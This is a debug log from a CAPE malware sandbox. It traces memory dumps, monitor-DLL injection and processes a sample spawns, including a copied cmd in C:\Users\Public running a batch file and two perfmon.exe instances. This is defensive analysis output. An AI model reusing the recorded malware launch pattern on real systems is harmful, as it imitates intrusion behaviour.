2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,864 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,880 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,894 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,926 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,941 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:37,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:37,941 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winbrand.dll
2020-03-24 10:13:37,941 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winbrand.dll
2020-03-24 10:13:37,941 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:37,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:37,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,957 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:37,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:13:37,957 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:13:37,957 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\apphelp.dll
2020-03-24 10:13:37,957 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x4A1A0000
2020-03-24 10:13:37,957 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x4A1A829A
2020-03-24 10:13:37,973 [root] DEBUG: Module image dump success
2020-03-24 10:13:37,973 [root] DEBUG: DumpProcessFixImports: Found IAT - 0x4a1a0ffc, size: 0x3a4
2020-03-24 10:13:37,989 [root] DEBUG: IAT parsing finished, found 229 valid APIs, missed 0 APIs
2020-03-24 10:13:37,989 [root] DEBUG: Adding module to module list: msvcrt.dll
2020-03-24 10:13:37,989 [root] DEBUG: Adding module to module list: ntdll.dll
2020-03-24 10:13:37,989 [root] DEBUG: Adding module to module list: kernel32.dll
2020-03-24 10:13:37,989 [root] DEBUG: Adding module to module list: winbrand.dll
2020-03-24 10:13:37,989 [root] DEBUG: Warning - IAT is not inside the PE image, requires rebasing.
2020-03-24 10:13:37,989 [root] DEBUG: Invalid PE file: import table rebuild failed.
2020-03-24 10:13:38,003 [root] DEBUG: Import table rebuild failed, falling back to unfixed dump.
2020-03-24 10:13:38,003 [root] INFO: Added new CAPE file to list with path: C:\uGrmFZ\CAPE\1340_69771570438132024232020
2020-03-24 10:13:38,066 [root] DEBUG: DoProcessDump: Full process memory dump saved to file: C:\uGrmFZ\memory\1340.dmp.
2020-03-24 10:13:38,066 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 10:13:38,082 [root] INFO: Notified of termination of process with pid 1340.
2020-03-24 10:13:43,089 [root] DEBUG: set_caller_info: Adding region at 0x04C60000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 10:13:43,137 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2444
2020-03-24 10:13:43,151 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:43,151 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:43,151 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:43,151 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:43,151 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:43,167 [root] DEBUG: Loader: Injecting process 2444 (thread 1472) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,167 [root] DEBUG: Process image base: 0x4AAD0000
2020-03-24 10:13:43,167 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,167 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:43,167 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,184 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2444
2020-03-24 10:13:43,184 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2444
2020-03-24 10:13:43,184 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:43,184 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:43,184 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:43,184 [lib.api.process] INFO: 32-bit DLL to inject is C:\lwhhhat\dll\vPbvFKVS.dll, loader C:\lwhhhat\bin\RjSTiJo.exe
2020-03-24 10:13:43,198 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:43,198 [root] DEBUG: Loader: Injecting process 2444 (thread 1472) with C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,198 [root] DEBUG: Process image base: 0x4AAD0000
2020-03-24 10:13:43,198 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,214 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 10:13:43,214 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\vPbvFKVS.dll.
2020-03-24 10:13:43,214 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2444
2020-03-24 10:13:43,230 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 10:13:43,230 [root] DEBUG: Full process memory dumps enabled.
2020-03-24 10:13:43,230 [root] DEBUG: Import reconstruction of process dumps enabled.
2020-03-24 10:13:43,230 [root] DEBUG: Process dumps enabled.
2020-03-24 10:13:43,246 [root] INFO: Disabling sleep skipping.
2020-03-24 10:13:43,276 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 10:13:43,276 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2444 at 0x74880000, image base 0x4aad0000, stack from 0x363000-0x460000
2020-03-24 10:13:43,276 [root] DEBUG: Commandline: C:\Users\Public\cmd \c ""C:\Users\Public\Yeso.bat" ".
2020-03-24 10:13:43,292 [root] INFO: Added new process to list with pid: 2444
2020-03-24 10:13:43,292 [root] INFO: Monitor successfully loaded in process with pid 2444.
2020-03-24 10:13:43,371 [root] INFO: Announced 64-bit process name: perfmon.exe pid: 1380
2020-03-24 10:13:43,371 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:43,385 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:43,385 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:43,385 [lib.api.process] INFO: 64-bit DLL to inject is C:\lwhhhat\dll\GCogZIdy.dll, loader C:\lwhhhat\bin\wgJoSRuu.exe
2020-03-24 10:13:43,385 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:43,385 [root] DEBUG: Loader: Injecting process 1380 (thread 1808) with C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:43,385 [root] DEBUG: Process image base: 0x000000013FB90000
2020-03-24 10:13:43,401 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:43,401 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:43,401 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:43,401 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 1380
2020-03-24 10:13:43,401 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 10:13:43,417 [root] DEBUG: DLL loaded at 0x73DA0000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2020-03-24 10:13:43,417 [root] DEBUG: DLL loaded at 0x73CA0000: C:\Windows\SysWOW64\PROPSYS (0xf5000 bytes).
2020-03-24 10:13:43,433 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 10:13:43,433 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-03-24 10:13:43,463 [root] DEBUG: DLL loaded at 0x74940000: C:\Windows\SysWOW64\ntmarta (0x21000 bytes).
2020-03-24 10:13:43,480 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2020-03-24 10:13:43,496 [root] DEBUG: DLL loaded at 0x74860000: C:\Windows\SysWOW64\profapi (0xb000 bytes).
2020-03-24 10:13:43,510 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2020-03-24 10:13:43,510 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2020-03-24 10:13:43,526 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2020-03-24 10:13:43,526 [root] DEBUG: DLL loaded at 0x75790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2020-03-24 10:13:43,526 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2020-03-24 10:13:44,447 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 10:13:44,447 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 10:13:44,447 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 10:13:44,463 [root] INFO: Announced 64-bit process name: perfmon.exe pid: 2788
2020-03-24 10:13:44,463 [root] DEBUG: DLL unloaded from 0x75E70000.
2020-03-24 10:13:44,463 [lib.api.process] INFO: Option 'procmemdump' with value '1' sent to monitor
2020-03-24 10:13:44,463 [lib.api.process] INFO: Option 'import_reconstruction' with value '1' sent to monitor
2020-03-24 10:13:44,463 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 10:13:44,463 [lib.api.process] INFO: 64-bit DLL to inject is C:\lwhhhat\dll\GCogZIdy.dll, loader C:\lwhhhat\bin\wgJoSRuu.exe
2020-03-24 10:13:44,477 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\pOpDnJNJHI.
2020-03-24 10:13:44,477 [root] DEBUG: Loader: Injecting process 2788 (thread 2152) with C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:44,493 [root] DEBUG: Process image base: 0x000000013F750000
2020-03-24 10:13:44,493 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:44,493 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 10:13:44,493 [root] DEBUG: Successfully injected DLL C:\lwhhhat\dll\GCogZIdy.dll.
2020-03-24 10:13:44,493 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2788
2020-03-24 10:13:44,602 [root] DEBUG: DLL loaded at 0x74810000: C:\Windows\system32\ndfapi (0x34000 bytes).
2020-03-24 10:13:44,665 [root] DEBUG: DLL loaded at 0x747F0000: C:\Windows\system32\wdi (0x15000 bytes).
2020-03-24 10:13:44,665 [root] DEBUG: DLL loaded at 0x75D00000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2020-03-24 10:13:44,680 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\syswow64\NSI (0x6000 bytes).
2020-03-24 10:13:44,680 [root] DEBUG: DLL loaded at 0x73C80000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-03-24 10:13:44,680 [root] DEBUG: DLL loaded at 0x747E0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-03-24 10:13:44,805 [root] DEBUG: DLL loaded at 0x73C50000: C:\Windows\SysWOW64\DUser (0x2f000 bytes).
2020-03-24 10:13:44,930 [root] DEBUG: DLL loaded at 0x73BD0000: C:\Windows\SysWOW64\UxTheme (0x80000 bytes).
2020-03-24 10:13:44,993 [root] DEBUG: DLL loaded at 0x73BB0000: C:\Windows\SysWOW64\dwmapi (0x13000 bytes).
2020-03-24 10:13:45,039 [root] DEBUG: DLL loaded at 0x73B80000: C:\Windows\system32\xmllite (0x2f000 bytes).
2020-03-24 10:13:45,221 [root] DEBUG: DLL unloaded from 0x73B80000.
2020-03-24 10:13:46,125 [modules.auxiliary.human] INFO: Found button "OK", clicking it
2020-03-24 10:13:47,140 [root] DEBUG: DLL unloaded from 0x758B0000.
2020-03-24 10:13:47,140 [root] DEBUG: DLL unloaded from 0x754F0000.
2020-03-24 10:13:47,155 [root] DEBUG: DLL unloaded from 0x73C50000.
2020-03-24 10:13:47,155 [root] DEBUG: DLL unloaded from 0x73DA0000.
2020-03-24 10:13:47,171 [root] DEBUG: DLL unloaded from 0x772F0000.
2020-03-24 10:13:47,171 [root] DEBUG: DLL unloaded from 0x74810000.
2020-03-24 10:13:47,201 [root] DEBUG: DLL unloaded from 0x74F40000.
2020-03-24 10:13:47,217 [root] DEBUG: DLL unloaded from 0x73CA0000.
2020-03-24 10:13:47,249 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2444
2020-03-24 10:13:47,249 [root] DEBUG: GetHookCallerBase: thread 1472 (handle 0x0), return address 0x4AAD7302, allocation base 0x4AAD0000.
2020-03-24 10:13:47,249 [root] DEBUG: DoProcessDump: Created dump file for full process memory dump: C:\uGrmFZ\memory\2444.dmp.
2020-03-24 10:13:47,592 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x4AAD0000.
2020-03-24 10:13:47,592 [root] DEBUG: ApiReader: module list size: 33
2020-03-24 10:13:47,608 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,608 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:47,608 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:47,624 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,624 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,624 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,624 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,638 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,654 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,670 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,686 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,686 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,686 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,686 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,701 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,701 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,701 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,701 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,717 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,733 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,747 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,747 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,747 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,763 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,779 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,795 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,795 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,811 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,811 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:47,825 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
